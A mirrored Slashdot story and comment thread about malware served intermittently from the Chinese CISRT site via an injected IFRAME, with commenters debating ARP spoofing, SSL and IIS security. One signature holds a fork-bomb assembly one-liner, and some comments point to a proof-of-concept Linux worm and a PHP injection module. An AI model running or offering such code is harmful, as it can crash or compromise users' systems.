Slashdot Mirror

← Back to Stories (view on slashdot.org)

Chinese Security Site Under New Kind of Attack

Posted by kdawson on from the novel-twist dept.

SkiifGeek writes "The main site for the Chinese Internet Security Response Team (CISRT) has been serving up infrequent attacks against site visitors through the use of an injected IFRAME tag that attempts to download and install numerous pieces of malicious software. While the source of the attack has yet to be identified, suspicion is that it might be an ARP attack being hosted by the CISRT's hosting provider. Rather than a straight-up infection attempt against all site visitors (as was the case with the Bank of India hack), it is an interesting evolution to see intermittent attack attempts against site visitors."

73 comments

  1. FTFA... by bangenge · · Score: 1, Insightful

    We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.

    Ummmm... I think if malicious code is inserted into your site, it's been compromised.

    --
    . o O ( TwO hEaDs ArE mOrE tHaN oNe... )
    1. Re:FTFA... by TheThiefMaster · · Score: 4, Informative

      Ummmm... I think if malicious code is inserted into your site, it's been compromised. Except it's not being inserted into the website itself, the page is being modified en-route to the client.
      Read up on ARP spoofing . The basic theory is that another machine at the same webhost is pretending to be the gateway to the internet, and so all traffic gets to flow through it and it can modify it as it wishes.
    2. Re:FTFA... by unsubscribe · · Score: 1

      If the ARP data is being falsified, visitors to the site could be directed to an alternate clone server, hosting pages with content the same as the original server but also including malicious code. If this is the case then the actual webserver has not been compromised, but users are still being exposed to the malicious code through the cloned server.

      For example:

      Say the webserver of the victim site has a public IP of (1.1.1.1), and a MAC address of (11:11:11:11:11:11). Its home page is (index.html).

      The victim site's ISP decides to perform an ARP attack. They set up a server which hosts a clone of the victim site. This server has a MAC address of (22:22:22:22:22:22). However, they modify (index.html) to include malicious code.

      The ISP sets up their managed switch so that instead of mapping (1.1.1.1) to (11:11:11:11:11:11), which would be correct, they map (1.1.1.1) to (22:22:22:22:22:22). Now, when users try to visit (1.1.1.1), they will visit the cloned server instead of the original server, and be exposed to the malicious code on the modified (index.html), even though the original server has not been compromised.

    3. Re:FTFA... by MichaelSmith · · Score: 4, Interesting

      A port block on http would work just as well but serving only https would defeat all variants on this attack, assuming that the certificate is set up correctly.

      The CISRT should know better than to use http without SSL.

      --
      http://michaelsmith.id.au
    4. Re:FTFA... by Bri3D · · Score: 1

      Have you ever tried using https exclusively on a production web server?
      Some people don't have infinite amounts of money to spend on the CPU to encrypt every byte of their homepage every time someone hits it...
      What's really needed is a signed HTTP solution that doesn't require full-stream encryption; if the user is submitting no data and the data being served is not secret, illegal, confidential, etc. there is no reason for full-stream encryption but a signature would prevent this sort of attack.

    5. Re:FTFA... by jthorpe · · Score: 1

      I'd say it's quite unlikely that this is an ARP spoof. In order for this to work, there would need to be other servers within the same layer 2 broadcast domain, meaning that the attacking server would have to be within the same VLAN. TFA provides nothing to support an ARP spoof as a probable cause.

    6. Re:FTFA... by rk075456 · · Score: 1

      yes, absolutely right..

    7. Re:FTFA... by mcrbids · · Score: 1

      Except it's not being inserted into the website itself, the page is being modified en-route to the client.
      Read up on ARP spoofing...[SNIP]

      Which is why SSL should be more commonly used. Seriously - an SSL cert costs less than a hundred bux/year, or less than two hundred bux per year for one that allows wildcard subdomains and completely defeats this, and loads of other attacks. (No, I'm not affiliated with RapidSSL, but I am a happy customer)

      The nice thing about wildcard SSL is that it effectively allows you to host multiple sites under a single IP address and port. Simply use subdomains of your root domain, and use Apache's VirtualHost directive!

      Or, we could take it one step further and actually USE dnssec - but that might be asking a bit too much...

      This attack is old. Technology to prevent it is well known and mature. Why are we still doing this?

      --
      I have no problem with your religion until you decide it's reason to deprive others of the truth.
    8. Re:FTFA... by TT076750 · · Score: 1

      ya.. i agree with u

  2. Strange Choice of Target, eh? by darthflo · · Score: 4, Interesting

    Does anyone understand why such an attack would be launched targeting a security site with a userbase that probably won't be too vulnerable to an IE-specific well-known and detected exploit?
    If this really is an ARP-spoofing based attack all other sites in their providers location ought to be vulnerable too and would make better targets, don't you think?

    By the way: what's the point in occasinally inserting the attack code (it will get detected sooner or later, no matter how often it's inserted, 100% of pageviews over 2 days would probably be better than 10% over a week)?

    1. Re:Strange Choice of Target, eh? by ultraparanoid · · Score: 0

      I would think that a retaliation aspect and/or demonstration purposes is the main factor. It does give a statement, doesn't it? "If we can hack the Chinese Internet Security Response Team server we can hack yours".

      --
      ultraparanoid.wordpress.com
    2. Re:Strange Choice of Target, eh? by WindBourne · · Score: 2, Insightful

      Unless of course, the security site is doing it iself. I would not be surprised if they are trying to inject into clients. More importantly, I would guess that it would not attack systems that come from other known security sites.

      --
      I prefer the "u" in honour as it seems to be missing these days.
    3. Re:Strange Choice of Target, eh? by Geheimagent · · Score: 1

      By the way: what's the point in occasinally inserting the attack code (it will get detected sooner or later, no matter how often it's inserted, 100% of pageviews over 2 days would probably be better than 10% over a week)?
      It's supposed to be an arp attack. Maybe they can't insert it into every connetion.
    4. Re:Strange Choice of Target, eh? by darthflo · · Score: 1

      They probably can't insert it into every connection, but the gateway will extremely probably have an arp cache which would mean it's inserted into 100% of all requests as long as the gateway's cache is compromised and 0% of all requests for the periods inbetween. TFA doesn't exactly mention how often and when this happens, but I interpreted it as "into some requests all the time". I don't know the TTL an entry in the gateway's ARP cache will receive but imagine it to be in the order of a few hours rather than minutes.

    5. Re:Strange Choice of Target, eh? by Anonymous Coward · · Score: 0

      By the way: what's the point in occasinally inserting the attack code (it will get detected sooner or later, no matter how often it's inserted, 100% of pageviews over 2 days would probably be better than 10% over a week)?

      From the writeup:

      While the source of the attack has yet to be identified, suspicion is that it might be an ARP attack being hosted by the CISRT's hosting provider.

      Intermittent bugs are harder to debug than easy-to-duplicate bugs.

    6. Re:Strange Choice of Target, eh? by querist · · Score: 1

      Not a strange choice at all...

      If you read the site, people go to this site to post questions when they are having problems. It is not only a "security" site for those of us who are security practitioners, but it is also a forum where non-security people can ask questions or ask for help.

      Actually, it's a great target because one would think that a security site would be safe. And, due to the nature of this attack, there is not much that the site's operators could have done to prevent it (other than the obvious use SSL, which I still don't know why they didn't do that).

      So, in retrospect, it makes perfect sense. This is sort of why some criminals dress up as various "trusted" types of people - they play on that assumed trust.

    7. Re:Strange Choice of Target, eh? by rk076200 · · Score: 1

      i don't think so its an ARP attack. how can a secure site like this can allow a silly attack directed to it's site.. maybe it's a part of their strategy..who knows!!!

    8. Re:Strange Choice of Target, eh? by darthflo · · Score: 1

      Three possible reasons:

      A) They're renting webspace, not a dedicated box.
      B) The ISP's *gateway* gets the spoofed ARP replies, their content is being reverse proxied thru the attackers server (why not, it may after all be the weakest link)
      C) They didn't secure their box.

  3. Interesting? by Big+Nothing · · Score: 5, Funny

    "it is an interesting evolution"

    Yes, if by "interesting" you mean "annoying". And by "evolution" you mean "I wish all malware creators would curl up in a corner and die."

    --
    SIG: TAKE OFF EVERY 'CAPTAIN'!!
    1. Re:Interesting? by Anonymous Coward · · Score: 5, Funny

      Malware creators have feelings too.

      For example, they laugh when you are infected with malware.

    2. Re:Interesting? by someone1234 · · Score: 1

      And i will laugh when the chinese police shots them on the spot.

      --
      Patents Drive Free Software as Hurricanes Drive Construction Industry
    3. Re:Interesting? by Dr.+Cody · · Score: 1

      "it is an annoying I wish all malware creators would curl up in a corner and die."?

    4. Re:Interesting? by Hal_Porter · · Score: 1

      It's quite possible on this Chinese ISP the majority of users are spammers, scammers, malware writer and blackhats. And they probably all wish the Chinese Internet Security Response Team would stop posting spoilers about their hard work.

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
  4. Ironic hackers? by ThirdPrize · · Score: 0, Redundant

    Getting the "Chinese Internet Security Response Team" website to deliver malware. Way to go.

    --
    I have excellent Karma and I am not afraid to Troll it.
  5. Re:CSIRT is dying by El+Lobo · · Score: 3, Funny

    IIS on a Windows 2003 server? That is one of the better and most secure combinations you can have today! Seriously, don't fool yourself. IIS 6 and 7 have a record of almost none critical exploits. In comparation with Apache it simply shimnes. And Windows 2003 is rock solid.

    --
    It's time to realise that Abble's products are the biggest abomination these days. Just say NO to the dumb iAbble way!!
  6. Re:CSIRT is dying by Yetihehe · · Score: 1

    Yeah. I still remember my first time installing 2003. After installation I have downloaded all patches with autoupdate. Next day I have run IE first time and there was already some adware on it. So it is NOT secure.

    --
    Extreme Programming - Redundant Array of Inexpensive Developers
  7. How is this IFRAME attack new? by Anonymous Coward · · Score: 0

    It was one of the main reasons I argued against using them originally to clients 8 years ago.

    now, AJAX... hehehe

  8. Re:CSIRT is dying by Yetihehe · · Score: 1

    if you got some adware I'm sure you are the one to be blamed somehow
    But HOW? As I said, first running of IE on fresh install after automatic updates and leaving computer overnight. On previous installations there were no adware at first, only after some time. So this was a test to check if it got there by itself. No one other than me had access to this computer. So windows 2003 is TOTALLY not secure (by default). I don't say it's less or more secure than apache+linux, but I have yet to have some virus on my slackware.
    --
    Extreme Programming - Redundant Array of Inexpensive Developers
  9. Common knowledge by packetmon · · Score: 3, Informative

    It shouldn't come as a shocker that attackers are trying to re-route traffic from legitimate sites to illegitimate ones. What's odd is, ARP spoofing can be curtailed by static ARP addressing and the network administrators of that netblock should be able to stop it outright or at minimum isolate the traffic. This is nothing more than a man in the middle attack and I've always wondered when someone was going to try it on a large scale... Guess I got my answer. Imagine this for a second though and the ramifications of it... Google, well known for huge amounts of servers dispersed throughout the world...

    Attacker on GoogleB farm's network --> man in the middle (for an hour a month) --> undetected --> redirect to malware cocktail site Visitors --> replicated Google --> view infected page

    Technically its possible provided the MITM attacker is on the same network, the network engineers didn't mitigate against it, someone is really determined.

    We've all (hopefully all of us) have heard of the "Storm" botnet. Its not an exaggeration to think of someone getting their act together and creating something on this level of an attack vector. The question is _when_ will it happen. Who knows for all you know Slashdot was loaded with a cocktail of malware when you visited this site. Hope people get a clue and keep their machines clean. There's not silver bullet solution when an attacker is 1) skillful enough 2) undetectable nowadays 3) has major motivation (finance).

    --
    Infiltrated dot Net
  10. Oblig. car analogy. by TapeCutter · · Score: 1

    I drove my new car out of the sales yard without looking and got cleaned up by a truck, obviously it's the car's fault.

    --
    And did you exchange a walk on part in the war for a lead role in a cage? - Pink Floyd.
    1. Re:Oblig. car analogy. by Anonymous Coward · · Score: 0

      Wow, the first car analogy I've seen on Slashdot that makes sense.

  11. IIS != IE by mousse-man · · Score: 1

    The Internet Immolation Server has actually become more secure, with few, if any, bad security holes found in the last two years. However, this does not hinder the coder to develop secure software, and anything that plugs into IIS needs to be as secure as IIS.

    The Internet Exploder however - well, it's reputation is well ahead of any statistics, as my de-wormed Windows boxen demonstrate.

  12. New? by DNS-and-BIND · · Score: 4, Informative
    No, this isn't new. I had it happen on my website while it was hosted in China. At the bottom of every page, there was an IFRAME pointing to an external site, automatically inserted just above the tag. I didn't find out about it because I used Opera, and of course I didn't get infected. I found out because my users were complaining that my front page set off their virus alarms. Silly me, I told them that my whole site was static HTML straight from Dreamweaver, and that there was no dynamic content that could be exploited. I assumed that my webserver was hacked (the Chinese ISP used IIS, of course) and told everyone there was nothing I could do. The problem "resolved itself" and then returned a few times.

    I've since moved to a Hong Kong server running BSD/Apache. Much cheaper, I get an actual control panel, and I'm not subject to the ridiculous requirements of the ICP permit. You know what you have to go through to get one of those for a business? Insane! And don't even mention that you're a foreigner, they go apeshit.

    --
    Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    1. Re:New? by rk076200 · · Score: 1

      i think the chinese can be more dangerous than anything on earth... ;)

    2. Re:New? by ColdWetDog · · Score: 1

      You hosted a website in China parodying the Communist Chinese government and you're complaining that they bothering you with annoying paperwork? Unless I'm misreading the whole point of your site, either the government has finally developed some sense of humor or you're lucky to be alive.

      --
      Faster! Faster! Faster would be better!
    3. Re:New? by Bearhouse · · Score: 1

      As you've found out, it's a good idea to regularly check your pages, using many browsers, (or - at least - the main ones like IE, Firefox...) Your host can screw things up for you - even simple things like breaking links, let alone stuff lie this.

      There are 3rd parties that can do this for you also.

    4. Re:New? by Anonymous Coward · · Score: 0

      No, actually those really are what the posters say. Funny old world, eh?

    5. Re:New? by DNS-and-BIND · · Score: 1

      Who said the site in my profile was the site I was talking about? The posters website is hosted in the USA, because that's where the customers are. The site I was talking about is for people in China, hence the hosting in China. Otherwise, there's no reason to host here, service is awful, expensive, and very very slow if you're outside the Great Firewall.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  13. Re:CSIRT is dying by PopeRatzo · · Score: 1

    But HOW? As I said, first running of IE on fresh install after automatic updates and leaving computer overnight.
    Maybe it came on the installation disk. It was Windows Server 2003, right?
    --
    You are welcome on my lawn.
  14. Re:CSIRT is dying by will_die · · Score: 3, Informative

    IIS 7 is actually rather nice. It is a complete rewrite from IIS 6, didn't they do that from IIS 5?
    They use Apache methods for uploading files, major fix over IIS6.
    The security is modular and supports security similar to what Apache does.
    And the configuration files are now text files which edit with your text editor. Wasn't that the main selling point with the IIS pros saying IIS was better because you did not have to use some text file where you had to go in manually edit?

  15. Re:CSIRT is dying by El+Lobo · · Score: 1

    It is. IIS7 is configurated via the usual GUI. The settings are STORED in text files, though, and not in the register as it was in older versions (to comply with .NET apps). But an administrator should not feel the diference.

    --
    It's time to realise that Abble's products are the biggest abomination these days. Just say NO to the dumb iAbble way!!
  16. Re:CSIRT is dying by nilbud · · Score: 0

    In what way are you "proud" to use microsoft products? Where does pride play a part in being a consumer, are you proud to use toilet paper or watch TV?

    --
    never let a man put his dirty how-do-you-do into your bajingo
  17. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    What about running a nix box using firefox, would you still have the problem of aquiring
    these malwares on your pc??? If this is not the case, then what about the same thing but inside a vmware install??? would it not curtail the threat while browsing the internet?

  18. Re:Common knowledge...firefox? by packetmon · · Score: 1
    Depends... I did a proof of concept for Linux:

    http://www.infiltrated.net/scripts/dsphunxion.sh

    http://www.infiltrated.net/scripts/dsphunxion.output

    The concept was a pseudo heuristic worm to be download via vuln on a Linux box. Caveats... Surfer would have to be root... Could be re-written to exploit something else to gain root though. Someone with modsecurity skills could do a re-write based on header information and redirect Linux boxes to their appropriate pages to download and exploit it though. Again, its theory and concept based

    --
    Infiltrated dot Net
  19. Disable dl() in PHP by Anonymous Coward · · Score: 0

    This is a common exploit -- use dl() to dynamically load a .so into PHP which allows arbitrary insertion of strings into returned webpages -- allows one to set a header/footer to be returned in any future pages served by that process. Search the internet for "flame.so"

  20. Re:CSIRT is dying by Anonymous Coward · · Score: 0

    are you proud to use toilet paper or watch TV?

    Better to be proud to use toilet paper than being proud not to.

  21. SLASHDOT PEOPLE ARE A PACK OF LAME FOOLS by Anonymous Coward · · Score: 0

    You people modded someone down for postings facts from a respected site for security on all platforms that you cannot dispute, which is quite lame. Shame on you losers here at slashdot is about all a body can state. I will add on SQL Server 2005 as well (another 0 unpatched flaw bearing Microsoft product which is often used in combination with IIS & Windows Server 2k3):

    SQLServer 2005 @ SECUNIA:

    http://secunia.com/product/6782/

    Affected By 0 Secunia advisories
    Unpatched 0% (0 of 0 Secunia advisories)

  22. Re:CSIRT is dying by Anonymous Coward · · Score: 0

    Starting with SP1, Windows 2003 Server now installs in an "everything off" mode, accepting no inbound connections. You are prompted to click a button to download and install the latest security updates, and prompted to configure automatic updates. That dialog also has the button to exit lockdown mode.

    Of course, if you're doing remote installs, you can configure lockdown mode to keep remote desktop enabled, but if you're doing remote installs you should have slipstreamed in the latest patches instead of just slipstreaming in SP1...

  23. ARP Attacks by madsheep · · Score: 1

    ARP attacks against websites like this are relatively uncommon but fairly easy to do. ISC (isc.sans.org) did a write-up not too long ago where someone's customer was attacked like this. Due to a lack of switch security and clients not using static ARP tables etc. this attack will exceed pretty frequently when hosts are on the same subnet/VLAN. I'm not sure the CSIRT website gets too much traffic to begin with, definitely more after being slashdotted. I don't think saying that their user-base doesn't use IE or is fully patched is accurate. Besides, from an attacker's point of view: who cares. It's hit or miss..and nothing happens when they miss. On top of that, who says they aren't arp spoofing this into every host and webserver on the network there? CSIRT might just be 1 of 100. Btw the first exe is pulled from the domain mentioned which then pulls a second file (100.exe) from another domain. It appears to be a password stealer. What a sad bunch of people doing all this crap.

  24. shame, but it's a lie by Anonymous Coward · · Score: 1, Informative

    I know another site who got EXACTLY this problem (iframes in the code, linking to malware), this was because of a worm exploiting vulnerabilities in php scripts, i wouldn't be surprised if they got hax0red and tried to say "hey it's ARP poisoning, another server got owned, not us!" what a shaaaame, they got pwn3d that's it, you can be sure.

  25. Thank You Slashdot by Anonymous Coward · · Score: 0

    for linking to a page that may try to download trojans to my computer.

  26. Re:Common knowledge...firefox? by DrSkwid · · Score: 1

    You know you've lost when you can't trust your OS to run user apps and you think the VM will save you.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  27. Re:CSIRT is dying by DrSkwid · · Score: 1

    "Completely re-written" doesn't often preface "therefore more secure".

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  28. is it possible by arjun21 · · Score: 1

    i think maybe this is a part of CISRT's trick to spread viruses. as a result more site visitors will look after them for help. and maybe the chinise government didnt pay salary for the employees at CISRT, and they use this attack to take revenge.

  29. Re:Injected by rk075245 · · Score: 1

    I think this attack cause by programming error. The program not secure, non-malicious problems. The proggramming flaw involve synchronization. The time-of-check to time-of-use (TOCTTOU) flaw concern mediation that is perform with a "bait and switch" in middle.

  30. Re:CSIRT is dying by mycall · · Score: 1

    Unless you do a UDP spoof onto a service that isn't patched.

  31. nice tag by BMojo · · Score: 1

    Nice tag guys: thatswhatyagetforalltheleadpaint. *Someone* is a little bitter over recent Chinese cyber attacks, not naming countries or anything.

    --


    -BMojo

  32. Chinaons.com by mattr · · Score: 2, Interesting

    I just noticed a day ago that a lot of html files I had stored on a usb hdd (my ipod) had had a line introduced, an iframe going to chinaons.com with some garble after it that might be Chinese. It was really disconcerting. Not just because of the line which was easily removed, but because Virus Buster would DELETE the files.

    I would really like to be able to make certain folders on my ipod read-only password protected when I plug it in, so I know this isn't happening.

  33. Re:CSIRT is dying by flonker · · Score: 1

    Only a very few settings were stored in the registry. Most of the settings are in the metabase. Don't ask, you really don't want to know. It is like the registry, only even more obscure to edit, and more prone to severe breakage.

  34. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    My point was still just using the snapshot ability to overwrite the previous os install after maybe 2 days, seeing as a snapshot takes about 15 minutes to restore, you could do a snapshot after the full install+upgrades etc.... then use that as your base for a malware free os, and after 2 days usage, wether you have malware or not, refresh os so to speak.

    I know this philosophy of using vmware may not be the original intent for its deployment, but
    short of creating your own os to be 100% certain that no malware can be installed, even linux can apparently get owned, so its not the os, its the usage of apps that make it insecure.

    We can't stop using our apps, so it will be up to something like vmware (for now) to help us, no?

  35. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    My hats off to you, if you were the one to write this code, got to say,
    I know when I am in the presence of greatness....again if you were the one to write the code.

    My compliments on the actual proof of concept though, beautiful!

    Care to elaborate on what your stem would be for accomplishing further steps, as the person
    accessing the page may not really have root, would there be a way to own the machine regardless
    of root access, maybe using a redirect to a process that does have root, say calling from firefox's
    known vulnerabilities???

  36. Re:Common knowledge...firefox? by DrSkwid · · Score: 1

    even Linux ! say it aint so.

    Eventually your malware will overwrite your snapshots or the binary that restores them.

    That said, the OS I use has daily snapshots (or as often as you like) to a central server (thus enabling coalescing of data blocks i.e. repeated blocks of data are stored only once). The choice of which snapshot to use is per process, so, for instance, you can compile yesterday's code in one window and last weeks in another and see what changed. Or boot any terminal into last month's state of any other etc. etc.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  37. Re:Common knowledge...firefox? by hesaigo999ca · · Score: 1

    unless someone was smart enough to have burned that iso of the snapshot on a dvd bhefore any malware got to it, so as to have a proper image each time....and I know someone who was a god in linux that tought me what to place on the cd-rom to avoid recompiles, so that certain directories could not be written to, therefor not rootkitted...

    "And they told me i couldn't play 7/8, I just did 2 bars of 3/4 and a 1"

  38. Re:Common knowledge...firefox? by DrSkwid · · Score: 1

    Plan 9 taught me that if your terminal needs backing up, you have already lost.
    Boot diskless and you don't need to image your disks and hope for the best because all of your terminals are just that, terminals. Storage belongs somewhere safe. These days cheap high speed networking should be making disks redundant in a LAN situation. The place is a damn sight quieter consumes less energy.

    There's a lot of places a 500Mhz EPIA fanless will do just fine.

    --
    There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter